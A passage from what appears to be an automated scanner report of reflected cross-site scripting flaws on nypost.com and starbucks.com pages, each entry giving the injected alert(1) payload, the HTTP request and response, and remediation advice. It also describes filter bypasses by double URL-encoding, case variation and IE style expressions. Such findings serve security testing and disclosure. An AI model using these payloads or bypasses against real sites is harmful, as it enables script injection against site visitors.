<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.
...[SNIP]...
_C=0;return b;}
var ni=_hbEvent("pv");ni.vpc="ni.250u";ni.gn="a.nypost.com";

//BEGIN EDITABLE SECTION
//CONFIGURATION VARIABLES
ni.acct="DM570110G2DA79EN3";//ACCOUNT NUMBER(S)
ni.pn="Fred Wilpon19a48"-alert(1)-"338cfffb690";//PAGE NAME(S)
ni.mlc="/topics";//MULTI-LEVEL CONTENT CATEGORY
ni.pndef="index";//DEFAULT PAGE NAME
ni.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
ni.f
...[SNIP]...

1.601. http://www.nypost.com/t/Fred%20Wilpon [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /t/Fred%20Wilpon

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1ecb%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecd07ad74b54 was submitted in the REST URL parameter 2. This input was echoed as a1ecb</script><script>alert(1)</script>cd07ad74b54 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /t/Fred%20Wilpona1ecb%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecd07ad74b54 HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; tracklink=; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.4.10.1297130884;

Response

HTTP/1.1 200 OK
Content-Length: 48331
Content-Type: text/html;charset=UTF-8
ETag: cc234938-300e-4431-b9f8-9ef2b725967f
Cache-Control: max-age=865
Date: Tue, 08 Feb 2011 05:45:42 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.
...[SNIP]...
<script type="text/javascript">

var sitezone = 'topic';
var kws = 'Fred Wilpona1ecb</script><script>alert(1)</script>cd07ad74b54';
var kvs = '';
var adexc = '';

</script>
...[SNIP]...

1.602. http://www.nypost.com/t/Fred%20Wilpon [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /t/Fred%20Wilpon

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 102b0%253cscript%253ealert%25281%2529%253c%252fscript%253e10de00e6326 was submitted in the REST URL parameter 2. This input was echoed as 102b0<script>alert(1)</script>10de00e6326 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /t/Fred%20Wilpon102b0%253cscript%253ealert%25281%2529%253c%252fscript%253e10de00e6326 HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; tracklink=; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.4.10.1297130884;

Response

HTTP/1.1 200 OK
Content-Length: 48250
Content-Type: text/html;charset=UTF-8
ETag: 0808b65c-72a6-45a3-aefd-13ed01796622
Cache-Control: max-age=885
Date: Tue, 08 Feb 2011 05:45:45 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.
...[SNIP]...
ETRIC 3 is used for Blogs. Param 2 = Blogs link.
ni.hc4= "";//CUSTOM METRIC 4 is used for Real Estate (outside application - do not use this metric!)
var cv = _hbEvent("cv");
cv.c5= "/t/Fred Wilpon102b0<script>alert(1)</script>10de00e6326|Fred Wilpon102b0<script>
...[SNIP]...

1.603. http://www.nypost.com/t/James%20Franco [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /t/James%20Franco

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd7f8%253c%252fScRiPt%2520%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9ada47a20d8 was submitted in the REST URL parameter 2. This input was echoed as dd7f8</ScRiPt ><script>alert(1)</script>9ada47a20d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /t/James%20Francodd7f8%253c%252fScRiPt%2520%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9ada47a20d8 HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; tracklink=; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.4.10.1297130884;

Response

HTTP/1.1 200 OK
Content-Length: 48349
Content-Type: text/html;charset=UTF-8
ETag: a31a01f7-9f22-476d-981c-e7262b42d553
Cache-Control: max-age=883
Date: Tue, 08 Feb 2011 05:45:39 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.
...[SNIP]...
C=0;return b;}
var ni=_hbEvent("pv");ni.vpc="ni.250u";ni.gn="a.nypost.com";

//BEGIN EDITABLE SECTION
//CONFIGURATION VARIABLES
ni.acct="DM570110G2DA79EN3";//ACCOUNT NUMBER(S)
ni.pn="James Francodd7f8</ScRiPt ><script>alert(1)</script>9ada47a20d8";//PAGE NAME(S)
ni.mlc="/topics";//MULTI-LEVEL CONTENT CATEGORY
ni.pndef="index";//DEFAULT PAGE NAME
ni.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
ni.f
...[SNIP]...

1.604. http://www.nypost.com/t/James%20Franco [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /t/James%20Franco

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f86fe%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8b2f5562500 was submitted in the REST URL parameter 2. This input was echoed as f86fe</script><script>alert(1)</script>8b2f5562500 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /t/James%20Francof86fe%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8b2f5562500 HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; tracklink=; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.4.10.1297130884;

Response

HTTP/1.1 200 OK
Content-Length: 48338
Content-Type: text/html;charset=UTF-8
ETag: 23a2b886-466a-4589-9452-44dd87f6a7fa
Cache-Control: max-age=900
Date: Tue, 08 Feb 2011 05:45:46 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.
...[SNIP]...
<script type="text/javascript">

var sitezone = 'topic';
var kws = 'James Francof86fe</script><script>alert(1)</script>8b2f5562500';
var kvs = '';
var adexc = '';

</script>
...[SNIP]...

1.605. http://www.nypost.com/t/James%20Franco [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /t/James%20Franco

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 61af5%253cscript%253ealert%25281%2529%253c%252fscript%253ed43cadbcc39 was submitted in the REST URL parameter 2. This input was echoed as 61af5<script>alert(1)</script>d43cadbcc39 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /t/James%20Franco61af5%253cscript%253ealert%25281%2529%253c%252fscript%253ed43cadbcc39 HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; tracklink=; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.4.10.1297130884;

Response

HTTP/1.1 200 OK
Content-Length: 48257
Content-Type: text/html;charset=UTF-8
ETag: c039c872-32df-430f-81c9-17ec28e482df
Cache-Control: max-age=879
Date: Tue, 08 Feb 2011 05:45:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.
...[SNIP]...
TRIC 3 is used for Blogs. Param 2 = Blogs link.
ni.hc4= "";//CUSTOM METRIC 4 is used for Real Estate (outside application - do not use this metric!)
var cv = _hbEvent("cv");
cv.c5= "/t/James Franco61af5<script>alert(1)</script>d43cadbcc39|James Franco61af5<script>
...[SNIP]...

1.606. http://www.nypost.com/t/Justin%20Bieber [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nypost.com
Path:   /t/Justin%20Bieber

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cea96"%3bf96074f9079 was submitted in the REST URL parameter 2. This input was echoed as cea96";f96074f9079 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /t/Justin%20Biebercea96"%3bf96074f9079 HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; tracklink=; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.4.10.1297130884;

Response

HTTP/1.1 200 OK
Content-Length: 48072
Content-Type: text/html;charset=UTF-8
ETag: 006d777a-d782-4b36-bba9-d15463895592
Cache-Control: max-age=900
Date: Tue, 08 Feb 2011 05:45:32 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.
...[SNIP]...
=0;return b;}
var ni=_hbEvent("pv");ni.vpc="ni.250u";ni.gn="a.nypost.com";

//BEGIN EDITABLE SECTION
//CONFIGURATION VARIABLES
ni.acct="DM570110G2DA79EN3";//ACCOUNT NUMBER(S)
ni.pn="Justin Biebercea96";f96074f9079";//PAGE NAME(S)
ni.mlc="/topics";//MULTI-LEVEL CONTENT CATEGORY
ni.pndef="index";//DEFAULT PAGE NAME
ni.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
ni.f
...[SNIP]...

1.607. http://www.nypost.com/t/Justin%20Bieber [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /t/Justin%20Bieber

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5af9f%253cscript%253ealert%25281%2529%253c%252fscript%253ea7c7ca2bb14 was submitted in the REST URL parameter 2. This input was echoed as 5af9f<script>alert(1)</script>a7c7ca2bb14 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /t/Justin%20Bieber5af9f%253cscript%253ealert%25281%2529%253c%252fscript%253ea7c7ca2bb14 HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; tracklink=; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.4.10.1297130884;

Response

HTTP/1.1 200 OK
Content-Length: 48264
Content-Type: text/html;charset=UTF-8
ETag: f8f3fafa-0135-4c8f-ac89-e67847e06144
Cache-Control: max-age=900
Date: Tue, 08 Feb 2011 05:45:38 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.
...[SNIP]...
RIC 3 is used for Blogs. Param 2 = Blogs link.
ni.hc4= "";//CUSTOM METRIC 4 is used for Real Estate (outside application - do not use this metric!)
var cv = _hbEvent("cv");
cv.c5= "/t/Justin Bieber5af9f<script>alert(1)</script>a7c7ca2bb14|Justin Bieber5af9f<script>
...[SNIP]...

1.608. http://www.nypost.com/upost [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /upost

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 512ba"><script>alert(1)</script>92df3f4e9fb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /upost?512ba"><script>alert(1)</script>92df3f4e9fb=1 HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; tracklink=; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.4.10.1297130884;

Response

HTTP/1.1 200 OK
Content-Length: 48025
Content-Type: text/html;charset=UTF-8
Expires: Tue, 08 Feb 2011 05:43:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 08 Feb 2011 05:43:57 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.
...[SNIP]...
<a class="log" href="/login?redirect=/upost&512ba"><script>alert(1)</script>92df3f4e9fb=1">
...[SNIP]...

1.609. http://www.nypost.com/video [channel parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /video

Issue detail

The value of the channel request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 706db"><script>alert(1)</script>6cdcd614a58 was submitted in the channel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video?channel=PostTopFilmStrip706db"><script>alert(1)</script>6cdcd614a58 HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.2.10.1297130884;

Response

HTTP/1.1 200 OK
Content-Length: 33805
Content-Type: text/html;charset=UTF-8
Expires: Tue, 08 Feb 2011 02:34:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 08 Feb 2011 02:34:57 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.
...[SNIP]...
<script type="text/javascript" src="http://publish.vx.roo.com/nypost/flashportal/20100911/embed/?vxSiteId=0db7b365-a288-4708-857b-8bdb545cbd0f&vxTemplate=NYPost_Main.swf&vxChannel=PostTopFilmStrip706db"><script>alert(1)</script>6cdcd614a58&customBanner=http://www.nypost.com/rw/SysConfig/WebPortal/nypost/images/title.png&vxClickToPlay=false">
...[SNIP]...

1.610. http://www.starbucks.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95116"%3balert(1)//81dd21ba950 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 95116";alert(1)//81dd21ba950 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?95116"%3balert(1)//81dd21ba950=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:13:59 GMT
Connection: close
Content-Length: 41116

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<script type="text/javascript">
       var flashvars = {};
       flashvars.playerType = "homepage";
       flashvars.playlistID = "69777476001";
       flashvars.playerLocation = "http://www.starbucks.com/?95116";alert(1)//81dd21ba950=1";
       var params = {};
       params.loop = "false";
       params.quality = "best";
       params.scale = "exactfit";
       params.wmode = "transparent";
       params.allowscriptaccess = "always";
       params.allownetw
...[SNIP]...

1.611. http://www.starbucks.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9ce4"style%3d"x%3aexpression(alert(1))"c1e3c89638a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a9ce4"style="x:expression(alert(1))"c1e3c89638a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?a9ce4"style%3d"x%3aexpression(alert(1))"c1e3c89638a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:13:55 GMT
Connection: close
Content-Length: 41173

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<a href="http://www.addthis.com/bookmark.php?v=250&amp;username=starbucks&amp;url=http://www.starbucks.com/?a9ce4"style="x:expression(alert(1))"c1e3c89638a=1" class="addthis_button_compact" title="Post to AddThis">
...[SNIP]...

1.612. http://www.starbucks.com/about-us [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /about-us

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9592"style%3d"x%3aexpression(alert(1))"d1e7701208 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a9592"style="x:expression(alert(1))"d1e7701208 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /about-us?a9592"style%3d"x%3aexpression(alert(1))"d1e7701208=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:13:39 GMT
Connection: close
Content-Length: 38564

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/about-us?a9592"style="x:expression(alert(1))"d1e7701208=1" />
...[SNIP]...

1.613. http://www.starbucks.com/about-us/company-information [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /about-us/company-information

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48515"style%3d"x%3aexpression(alert(1))"882196566b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 48515"style="x:expression(alert(1))"882196566b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /about-us/company-information?48515"style%3d"x%3aexpression(alert(1))"882196566b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:20:01 GMT
Connection: close
Content-Length: 39249

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/about-us/company-information?48515"style="x:expression(alert(1))"882196566b=1" />
...[SNIP]...

1.614. http://www.starbucks.com/about-us/company-information/online-policies/privacy-statement [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /about-us/company-information/online-policies/privacy-statement

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6624b"style%3d"x%3aexpression(alert(1))"6dff94306a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6624b"style="x:expression(alert(1))"6dff94306a9 in the application's response.

